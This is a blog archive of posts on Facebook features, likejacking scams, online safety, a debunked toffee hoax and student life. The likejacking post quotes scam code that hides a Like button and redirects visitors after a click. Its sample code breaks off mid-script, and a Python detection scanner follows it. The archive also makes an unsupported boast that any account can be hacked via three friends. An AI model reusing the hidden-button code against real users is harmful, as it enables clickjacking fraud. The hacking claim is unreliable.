Things To Be Expected On Facebook.

Facebook is in a period of change, where they are going to add new features and the highly expected App Center.

Today when I logged in to Facebook, I found this unusual icon in the sidebar called “Connection Search”. It’s actually a way of finding friends, like “Contact search”. When I clicked on the Connection Search icon, this page appeared.

Facebook connection search, a thing to expect?

So is this something to expect on Facebook? I asked some of my friends and no one has ever seen something called “Connection Search” before. Sadly the feature is still not available for me.

The other interesting thing here is the Tweet button. I think this is the first time we’ve seen an actual Tweet button on a main Facebook page.

Facebook is also about to roll out a new feature called “Trending Videos”, where they are going to put popular public videos on Facebook, just like What’s Hot on Google Plus.

I’ll put a screen cap, when I see “Trending Videos” on my timeline.

The Facebook App Center will look like this :

Facebook AppCenter


How Facebook Likejacking Can Be Used To Trigger Malicious Scripts.

Facebook likejacking is another method of clickjacking, where a user clicks a hidden Like button that shares a link with the user’s friends without the user’s knowledge.

Although Facebook has reduced likejacking incidents, recently there was a rise in likejacking scams. Therefore I decided to write a post explaining the mechanisms by which these likejacking scams work. I’ve written a post about malicious Facebook browser extensions, which can be found on my old blog.

I’m not going to talk about what clickjacking and likejacking are; I’m going to show the mechanism of how likejacking works and how it can be used to trigger a malicious script once the Like button is clicked.

A typical clickjacking scam page is usually designed to look like YouTube, a Facebook page or a video frame to trick the user into thinking it’s a legitimate website, but it can come in any form. The bottom line is that the website is designed to trick its users.

So I went to the clickjacking website mentioned in the Naked Security blog post and saved its code. You can find the HTML code of the website here:

Basically it’s a simple website made to look like a video frame: pretty simple HTML with some JavaScript. If you read the code from the top, the first thing you should see is the meta tags.

<meta property="og:title" content="[VIDEO] Snake Eats MAN!"/>
<meta property="og:site_name" content="[VIDEO] Snake Eats MAN" />
<meta property="og:image" content="" />
<meta property="og:description" content="CAUGHT ON TAPE- A Giant Snake Swallows Up A Zookeeper in Front of Hundreds of People!" />
<meta property="og:type" content="website" />
<meta property="fb:admins" content="38305883" />

These meta tags allow a malicious attacker to change the picture, title and message of the post that’s posted on the Facebook timeline, irrespective of the contents of the website.

Then comes the Like button code, which is a bit different in this webpage. Usually it’s the same Like button code.

However, there is a small modification to this code: the Like button is hidden with a small CSS trick, so the user won’t know that he’s clicking a Like button.

  filter:alpha(opacity=0); /* For IE8 and earlier */

So the hidden Like button iframe code will look like this.

In this website, it’s used like this.

With the help of some more CSS tricks, the hidden Like button can be placed near a fake play button image, so that when the user clicks the play button he actually clicks the hidden Like button and, without knowing it, shares the post on his timeline.

Up to here it’s pretty simple stuff. However, there is a small function called “FB.Event.subscribe” that lets a malicious user trigger a script once the Like button is clicked. Most scammers use this to load a survey that will earn the scammers money. However, it can also be used to trigger malicious JavaScript once the Like button is clicked, even if the Like button is not hidden.

In the following likejacking scam it’s used like this:

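<script charset="utf-8" type="text/javascript">
// 'edge.create' fires once the Like has been registered
FB.Event.subscribe('edge.create', function(response) {
        window.location = window.money_page; // send the visitor to the scammer's page
});
</script>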

However, a malicious attacker can modify the script to look like this, so that it loads malicious JavaScript once the Like button is clicked and the victim does not suspect anything.

<script charset="utf-8" type="text/javascript">
FB.Event.subscribe('edge.create', function(response) {
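
A static check for the two traits described in this post, as an added example rather than code from the original post or the scam page: it flags a Like-button iframe made invisible through zero opacity and an `edge.create` subscription inside a `<script>`, noting when the callback changes `location`. The class name, finding labels and regexes are this example's own, the sample page is constructed, and only inline styles on the iframe and its ancestors are inspected.

```python
import re
from html.parser import HTMLParser

# Heuristic patterns written for this example; tune them before real use.
INVISIBLE = re.compile(r"opacity\s*[:=]\s*0(?:\.0+)?\s*(?:[;)!]|$)", re.I)
LIKE_SRC = re.compile(r"^(?:https?:)?//(?:www\.)?facebook\.com/plugins/like\.php", re.I)
EDGE_HOOK = re.compile(r"FB\.Event\.subscribe\(\s*['\"]edge\.create['\"]")
NAVIGATE = re.compile(r"\blocation(?:\.href)?\s*=[^=]|\blocation\.(?:replace|assign)\s*\(")
VOID = {"meta", "img", "br", "hr", "input", "link"}  # tags with no end tag

class LikejackScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.styles, self.script = [], None  # open elements' styles; <script> text
        self.findings, self.og = set(), {}

    def handle_starttag(self, tag, attrs):
        a = {k: v or "" for k, v in attrs}
        if tag == "meta" and a.get("property", "").startswith("og:"):
            self.og[a["property"]] = a.get("content", "")  # what the shared post shows
        if tag == "iframe" and LIKE_SRC.match(a.get("src", "")):  # Like-button frame
            if any(INVISIBLE.search(s) for s in self.styles + [a.get("style", "")]):
                self.findings.add("hidden-like-iframe")
        if tag == "script":
            self.script = []
        if tag not in VOID:
            self.styles.append(a.get("style", ""))

    def handle_data(self, data):
        if self.script is not None:  # only text inside <script>, not visible text
            self.script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self.script is not None:
            code, self.script = "".join(self.script), None
            if EDGE_HOOK.search(code):  # runs once the Like is registered
                self.findings.add("like-hook-redirect" if NAVIGATE.search(code) else "like-hook")
        if tag not in VOID and self.styles:
            self.styles.pop()

def scan(html):
    parser = LikejackScanner()
    parser.feed(html)
    parser.close()
    return sorted(parser.findings), parser.og

CONSTRUCTED_SAMPLE = """<meta property="og:title" content="[VIDEO] constructed lure"/>
<div style="opacity:0; filter:alpha(opacity=0)"><iframe src="//www.facebook.com/plugins/like.php?href=x"></iframe></div>
<script>FB.Event.subscribe('edge.create', function(r) { window.location = window.money_page; });</script>"""
```

`scan()` returns the finding labels together with the Open Graph values, so a reviewer sees both the hidden button and the text the shared post would carry.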

Staying Frosty On Facebook.

We say we’re living in a digital world and how people are connected through the internet more than ever. However, when it comes to using social networking most people are still very primitive. The latest addition to this came yesterday when a teacher was blackmailed on Facebook into sex by the suspect who befriended her on Facebook (News Here).

I think the reason for people to act differently online than in real life is a very complex one, social networking has only been here for like 10 years and most people on Facebook have been there since 2008 or later so most probably they’ve been social networking for only 4 years or less. It’s a new thing for all human beings and people have failed to understand the differences and similarities in real life and life online.

  • What makes people not share their photos with everyone in real life while sharing them with everyone in the world on Facebook?
  • What makes people not be friendly and talk with strangers in real life, while they accept every friend request on Facebook without even knowing whether that person exists in real life, and believe what they say?
  • What makes people not share their private information in real life while they share everything that comes to their mind on Twitter?

Some good comments on the article “Teacher blackmailed into sex on Facebook”:

I think people, especially children, need to be taught how to be safe on social networks and internet safety practices before they start to use the internet, as we do with other things in real life. However, the fascinating thing is that because the internet and social networking have been around for such a short time, they are new even for parents, and parents themselves don’t know how to be safe online.

I think I was lucky in that way because I started learning about computers and the internet when I was 10 (I didn’t have my own computer, I got my first when I was 12) and I read the news and stories about how people got into trouble thanks to the internet. And when I got my own internet connection in 2010, when I was 20, I knew how to protect myself on the internet, and for me so far so good.

Being blackmailed into sex on Facebook is not the only thing that can happen to a person. There is an increasing trend where beautiful photos of girls are posted on popular forums and sometimes even on porn forums, which can affect you for the rest of your life. These photos are then used by other people to make fake profiles under fake names.

It’s amazingly simple for a fake profile on Facebook to get information from someone that they normally don’t share in real life, from mobile numbers to personal stories. Especially if you use a female profile, it’s really easy to get information from both males and females alike.

This video from Tom Ryan shows how easily he got access to classified military information by using a fake profile called Robin Sage: Tom Ryan | Palantir Technologies

There is another danger that you don’t understand in adding unknown people on Facebook. You can hack ANY, YES ANY Facebook account, if you can add 3 profiles to your target profile. I’m not going to reveal the process, but trust me, it’s very simple to hack any Facebook profile if you can slip in 3 friends.

How to stay safe:

  • Try to stay as anonymous as possible. Don’t even give your real date of birth to Facebook; Facebook only needs it to confirm you are above the age to have a Facebook account.
  • Don’t add unknown people on Facebook; if you do, make sure they don’t see the personal stuff you post on Facebook.
  • Always use two-factor authentication, so it’ll make your Facebook account almost always bulletproof. You can activate two-factor authentication from the security settings on Facebook.
  • Don’t post any photos of yourself on Facebook, and it’s better not to let others take photos of you if they are going to post them on Facebook.
  • And importantly, learn how to be safe online before you jump into it.

NoLimit Is Not Serving Harmful Toffees, The Truth Is Out There.

This is the new year season, and one of the biggest fashion lines that people go to for new year clothes is No Limit. Recently there has been a huge increase in the popular toffee scam message associated with No Limit. The spam is mainly circulated via Facebook, Twitter and emails. Summed up, the message goes like this:

At No Limit showrooms they are serving their customers a toffee that contains Malic Acid. And this toffee is very dangerous for pregnant women and can also make males infertile, and this is a plot by the No Limit fashion line, owned by a Muslim businessman, to make the Sinhala people (the majority in Sri Lanka) infertile so one day the Muslims will become the majority.

First of all, I don’t know why No Limit is serving a toffee in their showrooms; if anyone knows the reason, leave a comment down below. So I decided to shed some light on this matter, because most people don’t understand this message and share it without looking into it further.

See the malic acid in the message? As soon as I first read this message a bell rang in my head: I’d heard the term malic acid in my biochemistry lectures, and as I remember it’s a harmless substance naturally occurring in the human body. I looked through my biochemistry lectures but I couldn’t find malic acid. Yesterday I did some searching and found this.

In its ionized form malic acid is called malate

The ever so famous malate, which is a fundamental molecule of all biochemistry cycles occurring in the human body. The people who are spreading this message are tricking people by using the term malic acid, not malate, the ionized form of malic acid. As most people know, acids exist in their ionized form in solutions and also in the human body. Therefore malic acid exists as malate in the human body.

The people who spread this message on social networks give no reference to where they found this information or how they found that malic acid is not good for health. However, I did some searching about malic acid at PubMed, which is a standard website for medical students to get reliable information about medicine, and it had this to say.

In its ionized form malic acid is called malate. Malate is an intermediate of the TCA cycle along with fumarate. It can also be formed from pyruvate as one of the anaplerotic reactions. In humans, malic acid is both derived from food sources and synthesized in the body through the citric acid cycle or Krebs cycle which takes place in the mitochondria. Malate’s importance to the production of energy in the body during both aerobic and anaerobic conditions is well established.

( is the PubMed website associated with biochemistry)

The PubMed article gives a very good explanation of malic acid from top to bottom, from the simple text I quoted above to very highly advanced information, which alone is enough to put a lid on this case.

Leave the technical details aside if you don’t understand what this means; basically, malate is an intermediate of the energy production pathway in the human body. It is also an important intermediate in gluconeogenesis (production of glucose by the liver when you are not having food for a long period of time, like in sleep). So without malate you can’t survive; it is an important molecule in the human body. Malic acid is also found in apples, so if you are afraid of malic acid then you should be afraid of apples too. If you look at the chart below you’ll see how important malate (malic acid) really is.

Image source: Wikipedia.

More chemical analysis needs to be done to find out whether the toffee contains any harmful substances, but the message going around Facebook and Twitter is a scam, probably to keep people away from No Limit showrooms during this new year season.

Malic acid is totally innocent, and you should not be afraid to eat food containing malic acid. If you think I’m wrong, give some hard proof from good resources associated with biomedicine, biochemistry or medicine. So next time think twice about what you are sharing on social media. TANGO DOWN.

Associated articles : 

Metabocard for L-Malic acid (HMDB00156)  (PubMed)

Malic Acid (Wikipedia)

To Stress The System

Move Fast And Break Things

Everyone on the internet is talking about the Facebook IPO and virtually everything that has to be said about the IPO has now been said. This new Facebook IPO trend made me watch “The Social Network” again (I can’t even remember the number of times I’ve watched the movie).

The Social Network is an inspirational movie for me. I wanted to write this post from the very first time I watched the movie, but I didn’t have the time or a place like this blog, because I hadn’t started this blog back in 2010, but I’ve mentioned these ideas on Twitter from time to time. Most of my colleagues laugh at the back of their minds when I talk about stuff like this: a guy in medical college who can’t even get an A pass for an exam talking about reaching impossible goals, or a guy who is not satisfied being at medical college.

To tell you the truth, I’m not satisfied with being at medical college. I strongly believe that this life is ours to enjoy and we don’t have to be stuck in offices till we become grandparents. From the beginning I’ve never wanted to work as a doctor for the rest of my life. I only want to stay a doctor until I make enough money to live the rest of my life; I want to retire quickly and enjoy the rest of my life in peace. Some argue that it is a doctor’s responsibility to serve the needs of poor patients, but come on, we spend the best part of our lives cramming books inside libraries while others get the chance to enjoy their lives to the fullest in their teens; even doctors have the right to enjoy their lives.

I think the problem is in the society that I live in. From the day we enter primary school there is the competition to be first in the class, and when we do Advanced Level there is competition to enter medical college or engineering college, so the only thing that students do is chew up the books. After entering university this is even worse, and 75% of university time is spent on studies.

Let’s take an example. I’m a medical student, I passed my Advanced Level on my first attempt and got the chance to enter one of the best medical colleges in the country. When I pass out I’ll be 25 years old, without even earning a penny in the 5 years spent at medical college. Then I won’t be getting a good income until I stabilize in the medical field, and that’ll take at least another 10 years. I’ll be 35 by then and I won’t be even half as rich as Mark Zuckerberg was when he was 25. This story is even worse for someone who entered medical college on his third attempt at Advanced Level.

I don’t think the problem is with the education system, I think the problem is with students’ mindset. Everyone is obsessed with getting a first class at medical college and no one wants to do something innovative in their time at medical college other than studying. The problem is that in our college society, if someone needs to get the respect of others, they need to get an extremely good result. And the people who do get an extremely good result don’t care a shit about the people who get a normal result and just pass the exam.

Students need to break this system of being bookworms, or else we won’t have someone like Mark, Steve Jobs or David Karp from this education system, forever, until we change the system. It’s not a problem with the education system, it’s a problem of how we use the system. Break the system or at least stress the system. If each and every one of us doesn’t try to break or stress the system, the system will stay the same, but if everyone tries to stress the system then the system will break at some point. If we don’t, then we’ll be just like the rest of them, spending our lives at offices and doing our jobs until we become grandparents. But then again what do I know, I’m just another outcast student blogging his random thoughts.

Anything is possible, just keep thinking.